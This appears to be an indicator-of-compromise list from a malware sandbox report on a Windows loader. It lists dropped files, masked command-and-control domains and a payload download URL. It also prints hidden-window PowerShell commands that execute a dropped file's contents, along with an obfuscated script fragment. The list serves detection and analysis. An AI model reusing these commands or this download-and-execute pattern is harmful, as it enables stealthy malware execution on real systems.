Technical Information
- wab.exe
- %TEMP%\nsa10c3.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\kravspecifikation.lnk
- %TEMP%\nsp1391.tmp\nsdialogs.dll
- %LOCALAPPDATA%\flavanthrene\flettebrevet11.lan
- %LOCALAPPDATA%\flavanthrene\develin.svr
- %LOCALAPPDATA%\flavanthrene\hydroaviation.bri
- %LOCALAPPDATA%\flavanthrene\noles.opl
- %LOCALAPPDATA%\flavanthrene\statuses119.kab
- %LOCALAPPDATA%\flavanthrene\cirsophthalmia.fer
- %LOCALAPPDATA%\flavanthrene\dmpningens.txt
- %LOCALAPPDATA%\flavanthrene\humlebier\klejnens\hardtacks\fingerstningers.fja
- %WINDIR%\fonts\disroots.lnk
- %TEMP%\nsp1391.tmp\nsdialogs.dll
- 'sc########flensburg.freifunk.net':80
- http://sc########flensburg.freifunk.net/wp-includes/BanqYXTvfwTmlAKVf116.bin
- DNS ASK sc########flensburg.freifunk.net
- DNS ASK bb##1.shop
- ClassName: '#32770' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden $d = Get-Content '%LOCALAPPDATA%\flavanthrene\Develin.Svr' ; powershell.exe ''$d''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "<#nellies Spluttering Foliebakkerne Familieforholdet Benzinkrig Instantiates #><#Preexcuse Unblundered Passionfulness Giusto digesmutterne Degradere #><#Gala Magnetify Forstirre Luftfartj Poka...
- '%ProgramFiles(x86)%\windows mail\wab.exe'